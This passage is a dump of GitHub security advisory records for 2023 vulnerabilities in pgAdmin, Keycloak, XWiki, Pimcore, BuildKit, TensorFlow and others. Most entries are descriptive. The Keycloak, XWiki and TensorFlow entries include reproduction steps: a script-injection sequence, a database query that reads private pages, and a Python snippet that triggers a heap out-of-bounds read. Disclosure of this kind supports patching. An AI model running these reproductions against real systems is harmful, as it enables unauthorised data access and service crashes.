[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'pgadmin4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.18'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0241'}, {'type': 'WEB', 'url': 'https://github.com/pgadmin-org/pgadmin4/issues/5734'}, {'type': 'WEB', 'url': 'https://github.com/akshay-joshi/pgadmin4/commit/64d7289c5b3831137b17bb4c5022ef4f63d2ef42'}, {'type': 'PACKAGE', 'url': 'https://github.com/pgadmin-org/'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN01398015/'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T19:30:03Z', 'nvd_published_at': '2023-03-27T21:15:00Z'}
1.4.0
GHSA-6q8m-42qq-64r7
2023-03-02T17:16:46Z
2023-03-01T09:30:29Z
null
['CVE-2021-4326']
Imperative CLI vulnerable to Command Injection
A vulnerability in Imperative framework which allows already-privileged local actors to execute arbitrary shell commands via plugin install/update commands, or maliciously formed environment variables. Impacts Zowe CLI.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': '@zowe/imperative'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.7.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@zowe/imperative'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4326'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/pull/900'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/pull/902'}, {'type': 'PACKAGE', 'url': 'https://github.com/zowe/imperative/'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/commits/v4.18.10'}, {'type': 'WEB', 'url': 'https://github.com/zowe/imperative/commits/v5.7.1'}]
{'cwe_ids': ['CWE-77'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T22:57:51Z', 'nvd_published_at': '2023-03-01T08:15:00Z'}
1.4.0
GHSA-34m5-796p-mjcp
2023-04-10T19:59:10Z
2023-03-30T12:30:15Z
null
['CVE-2023-28935']
Apache UIMA DUCC allows remote code execution
** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" (DUCC) module of Apache UIMA, an authenticated user that has the permissions to modify core entities can cause command execution as the system user that runs the web process. As the "Distributed UIMA Cluster Computing" module for UIMA is retired, we do not plan to release a fix for this issue. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.uima:uima-ducc-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28935'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/uima-ducc'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/r19z14b9rrfxv72r93q5trq5tyffo75g'}]
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T21:44:38Z', 'nvd_published_at': '2023-03-30T10:15:00Z'}
1.4.0
GHSA-w354-2f3c-qvg9
2023-09-25T17:19:40Z
2023-03-01T16:18:55Z
null
['CVE-2022-1438']
Keycloak vulnerable to Cross-site Scripting
A flaw was found in Keycloak. Under specific circumstances, HTML entities are not sanitized during user impersonation, resulting in a Cross-site scripting (XSS) vulnerability. ## Details This issue is the result of code found in the exception here: [https://github.com/keycloak/keycloak/blob/48835576daa158443f69917ac309e1a7c951bc87/services/src/main/java/org/keycloak/authentication/AuthenticationProcessor.java#L1045](https://github.com/keycloak/keycloak/blob/48835576daa158443f69917ac309e1a7c951bc87/services/src/main/java/org/keycloak/authentication/AuthenticationProcessor.java#L1045) ## Steps to reproduce When using the legacy admin console: 1. Sign in as Admin user in first tab. 2. In that tab create new user in keycloak admin section > intercept user creation request and modify it by including malicious js script there (in username field). 3. Sign in as newly created user in second tab (same browser window but second tab). 4. Navigate back to first tab where you are signed in as admin, navigate to admin console which lists all application users. 5. Choose any user (except newly created malicious one) – modify anything for that user in his settings. E.g. navigate to credentials tab and set new credentials for him. Also set new password as temporary. 6. After update for that user is made, use impersonate option on that modified user. 7. You should see window with form which requires providing new credentials – fill it and submit request. 8. Just after submiting request user will get notified that “You are already authenticated as different user ‘[user + payload]’ in this session. Please sign out first.” And malicious payload will be executed instantly.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '21.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-w354-2f3c-qvg9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-1438'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1043'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1044'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1045'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1047'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1049'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2022-1438'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2031904'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/blob/48835576daa158443f69917ac309e1a7c951bc87/services/src/main/java/org/keycloak/authentication/AuthenticationProcessor.java#L1045'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T16:18:55Z', 'nvd_published_at': None}
1.4.0
GHSA-vq4h-9ghm-qmrr
2023-04-07T19:23:01Z
2023-03-30T03:30:38Z
null
['CVE-2023-25000']
HashiCorp Vault's implementation of Shamir's secret sharing vulnerable to cache-timing attacks
HashiCorp Vault's implementation of Shamir's secret sharing used precomputed table lookups, and was vulnerable to cache-timing attacks. An attacker with access to, and the ability to observe a large number of unseal operations on the host through a side channel may reduce the search space of a brute force effort to recover the Shamir shares. Fixed in Vault 1.13.1, 1.12.5, and 1.11.9.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25000'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/pull/19495'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-10-vault-vulnerable-to-cache-timing-attacks-during-seal-and-unseal-operations/52078'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230526-0008/'}]
{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T19:23:01Z', 'nvd_published_at': '2023-03-30T01:15:00Z'}
1.4.0
GHSA-vpx4-7rfp-h545
2023-03-03T22:46:43Z
2023-03-03T22:46:43Z
null
['CVE-2023-26473']
Unprivileged XWiki Platform users can make arbitrary select queries using DatabaseListProperty and suggest.vm
### Impact Any user with edit right can execute arbitrary database select and access data stored in the database. To reproduce: * In admin, rights, remove scripting rights for {{XWikiAllGroup}}. * Create a new user without any special privileges. * Create a page "Private.WebHome" with {{TOKEN_42}} as content. Go to "page administration" and explicitly set all rights for "Admin" to remove them for all other users. * Logout and login as the unprivileged user. Ensure that the previously created page cannot be viewed. * Create a new page "ExploitClass.WebHome" and then open it in the class editor (first, make the user an advanced user). * Add a field named {{ContentList}} of type {{Database List}} * Enter in field "Hibernate Query" the following content: {noformat}select doc.content, doc.fullName from XWikiDocument as doc where doc.fullName = 'Private.WebHome'{noformat} * Save the class. * Open [http://localhost:8080/xwiki/bin/view/ExploitClass/?xpage=suggest&classname=ExploitClass.WebHome&fieldname=ContentList&firCol=doc.fullName&secCol=-] ### Patches The problem has been patched on XWiki 13.10.11, 14.4.7, and 14.10. ### Workarounds There is no workaround for this vulnerability other than upgrading. ### References https://jira.xwiki.org/browse/XWIKI-19523 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3-rc-1'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vpx4-7rfp-h545'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26473'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19523'}]
{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:46:43Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
1.4.0
GHSA-rcg9-hrhx-6q69
2023-03-20T17:18:37Z
2023-03-20T17:18:37Z
null
['CVE-2023-28429']
Pimcore has Cross-site Scripting vulnerability in DataObject tooltip field
### Impact Unsecured tooltip field in DataObject class definition. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. ### Patches Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14574.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/14574.patch manually. ### References
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-rcg9-hrhx-6q69'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28429'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14574'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14574.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T17:18:37Z', 'nvd_published_at': '2023-03-20T15:15:00Z'}
1.4.0
GHSA-8692-g6g9-gm5p
2023-03-03T22:52:47Z
2023-03-03T22:52:47Z
null
['CVE-2023-26478']
xwiki contains Exposed Dangerous Method or Function
### Impact `org.xwiki.store.script.TemporaryAttachmentsScriptService#uploadTemporaryAttachment` is returning an instance of `com.xpn.xwiki.doc.XWikiAttachment`. This class is not supported to be exposed to users without the `programing` right. `com.xpn.xwiki.api.Attachment` should be used instead and takes case of checking the user's rights before performing dangerous operations. ### Patches This has been patched in the version 14.9-rc-1 and 14.4.6. ### Workarounds There's no workaround for this issue. ### References https://jira.xwiki.org/browse/XWIKI-20180 ### For more information If you have any questions or comments about this advisory: * Open an issue in [JIRA](https://jira.xwiki.org/) * Email us at [security ML](mailto:security@xwiki.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-store-filesystem-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.3-rc-1'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-store-filesystem-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9-rc-1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-8692-g6g9-gm5p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26478'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/3c73c59e39b6436b1074d8834cf276916010014d'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20180'}]
{'cwe_ids': ['CWE-749'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:52:47Z', 'nvd_published_at': '2023-03-02T18:15:00Z'}
1.4.0
GHSA-8jh8-33f5-cgfp
2023-03-13T15:33:02Z
2023-03-07T09:30:30Z
null
['CVE-2023-1243']
Answer vulnerable to Cross-site Scripting
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1243'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/9870ed87fb24ed468aaf1e169c2d028e0f375106'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1d62d35a-b096-4b76-a021-347c3f1c570c'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:03:00Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
1.4.0
GHSA-cj6r-8pxj-5jv6
2023-05-23T20:49:09Z
2023-03-10T21:30:19Z
null
['CVE-2023-27902']
Incorrect Permission Preservation in Jenkins Core
Jenkins uses temporary directories adjacent to workspace directories, usually with the @tmp name suffix, to store temporary files related to the build. In pipelines, these temporary directories are adjacent to the current working directory when operating in a subdirectory of the automatically allocated workspace. Jenkins-controlled processes, like SCMs, may store credentials in these directories. Jenkins 2.393 and earlier, LTS 2.375.3 and earlier, and prior to LTS 2.387.1 shows these temporary directories when viewing job workspaces, which allows attackers with Item/Workspace permission to access their contents. Jenkins 2.394, LTS 2.375.4, and LTS 2.387.1 does not list these temporary directories in job workspaces. As a workaround, do not grant Item/Workspace permission to users who lack Item/Configure permission, if you’re concerned about this issue but unable to immediately update Jenkins.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27902'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27902.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-1807'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:44:16Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
1.4.0
GHSA-3223-w774-99fq
2023-03-22T19:54:12Z
2023-03-16T18:34:20Z
null
['CVE-2023-1429']
Cross-site Scripting (XSS) in Document Types
### Impact Unsecured Name field in Document Types module in Settings. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. ### Patches Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14645.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/14645.patch manually. ### References https://huntr.dev/bounties/e0829fea-e458-47b8-84a3-a74476d9638f/
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-3223-w774-99fq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1429'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7588c336edb24050656111b89d69e69cc9feb5f5'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e0829fea-e458-47b8-84a3-a74476d9638f'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:34:20Z', 'nvd_published_at': '2023-03-16T12:15:00Z'}
1.4.0
GHSA-gc89-7gcr-jxqc
2023-03-07T20:09:44Z
2023-03-07T20:09:44Z
null
['CVE-2023-26054']
Buildkit credentials inlined to Git URLs could end up in provenance attestation
When the user sends a build request that contains a Git URL that contains credentials and the build creates a provenance attestation describing that build, these credentials could be visible from the provenance attestation. Git URL can be passed in two ways: 1) Invoking build directly from a URL with credentials. ``` buildctl build --frontend dockerfile.v0 --context https://<credentials>@url/repo.git ``` Equivalent in `docker buildx` would be ``` docker buildx build https://<credentials>@url/repo.git ``` 2) If the client sends additional VCS info hint parameters on builds from a local source. Usually, that would mean reading the origin URL from `.git/config` file. Thanks to Oscar Alberto Tovar for discovering the issue. ### Impact When a build is performed under specific conditions where credentials were passed to BuildKit they may be visible to everyone who has access to provenance attestation. Provenance attestations and VCS info hints were added in version v0.11.0. Previous versions are not vulnerable. In v0.10, when building directly from Git URL, the same URL could be visible in `BuildInfo` structure that is a predecessor of Provenance attestations. Previous versions are not vulnerable. Note: [Docker Build-push Github action](https://github.com/docker/build-push-action) builds from Git URLs by default but **is not** affected by this issue even when working with private repositories because the credentials are passed [with build secrets](https://github.com/docker/build-push-action/blob/v4.0.0/src/context.ts#L203) and not with URLs. ### Patches Bug is fixed in v0.11.4 . ### Workarounds It is recommended to pass credentials with build secrets when building directly from Git URL as a more secure alternative than modifying the URL. In Docker Buildx, VCS info hint can be disabled by setting `BUILDX_GIT_INFO=0`. `buildctl` does not set VCS hints based on `.git` directory, and values would need to be passed manually with `--opt`. ### References - Inline credentials in URLs deprecated in RFC3986 https://www.rfc-editor.org/rfc/rfc3986#section-3.2.1
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/moby/buildkit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.11.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/moby/buildkit/security/advisories/GHSA-gc89-7gcr-jxqc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26054'}, {'type': 'WEB', 'url': 'https://github.com/moby/buildkit/commit/75123c696506bdbca1ed69906479e200f1b62604'}, {'type': 'PACKAGE', 'url': 'https://github.com/moby/buildkit'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc3986#section-3.2.1'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:09:44Z', 'nvd_published_at': '2023-03-06T19:15:00Z'}
1.4.0
GHSA-h5v2-wrhp-5v35
2023-03-16T21:41:07Z
2023-03-12T06:30:21Z
null
['CVE-2022-48367']
Access control issue in ezsystems/ezpublish-kernel
Access control based on object state is mishandled. This is a policy you can use in your roles to limit access to content based on specific object state values. Due to a flawed earlier update, these limitations were ineffective in releases made since February 16th 2022. They would grant access to the given content regardless of the object state. Depending on how your frontent is designed, knowing the URL to the content may or may not be required to access it. If you are using object state limitations in your roles, this issue is critical. Please apply the fix as soon as possible.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.28'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-5x4f-7xgq-r42x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48367'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2022-004-ineffective-object-state-limitation-and-unauthenticated-fastly-purge'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezpublish-kernel'}]
{'cwe_ids': ['CWE-862'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:54:16Z', 'nvd_published_at': '2023-03-12T05:15:00Z'}
1.4.0
GHSA-6x5v-cxpp-pc5x
2023-03-23T19:10:59Z
2023-03-21T06:30:17Z
null
['CVE-2023-1540']
Answer has Observable Response Discrepancy
Observable Response Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1540'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/1de3ec27e50ba7389c9449c59e8ea3a37a908ee4'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d8d6c259-a0f2-4209-a3b0-ecbf3eb092f4'}]
{'cwe_ids': ['CWE-203', 'CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:37Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
1.4.0
GHSA-gw97-ff7c-9v96
2023-03-27T22:03:05Z
2023-03-24T21:57:01Z
null
['CVE-2023-25668']
TensorFlow has a heap out-of-buffer read vulnerability in the QuantizeAndDequantize operation
### Impact Attackers using Tensorflow can exploit the vulnerability. They can access heap memory which is not in the control of user, leading to a crash or RCE. When axis is larger than the dim of input, c->Dim(input,axis) goes out of bound. Same problem occurs in the QuantizeAndDequantizeV2/V3/V4/V4Grad operations too. ```python import tensorflow as tf @tf.function def test(): tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5], input_min=[1.0], input_max=[10.0], signed_input=True, num_bits=1, range_given=True, round_mode='HALF_TO_EVEN', narrow_range=True, axis=0x7fffffff) test() ``` ### Patches We have patched the issue in GitHub commit [7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb](https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gw97-ff7c-9v96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25668'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
{'cwe_ids': ['CWE-122', 'CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:57:01Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
1.4.0
GHSA-5gp5-vxj6-4257
2023-03-13T19:18:27Z
2023-03-07T00:30:24Z
null
['CVE-2022-4134']
OpenStack Glance Inclusion of Functionality from Untrusted Control Sphere vulnerability
A flaw was found in openstack-glance. This issue could allow a remote, authenticated attacker to tamper with images, compromising the integrity of virtual machines created using these modified images.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'glance'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '25.1.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-0757'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4134'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/glance/+bug/1990157'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2147462'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/glance'}, {'type': 'WEB', 'url': 'https://wiki.openstack.org/wiki/OSSN/OSSN-0090'}]
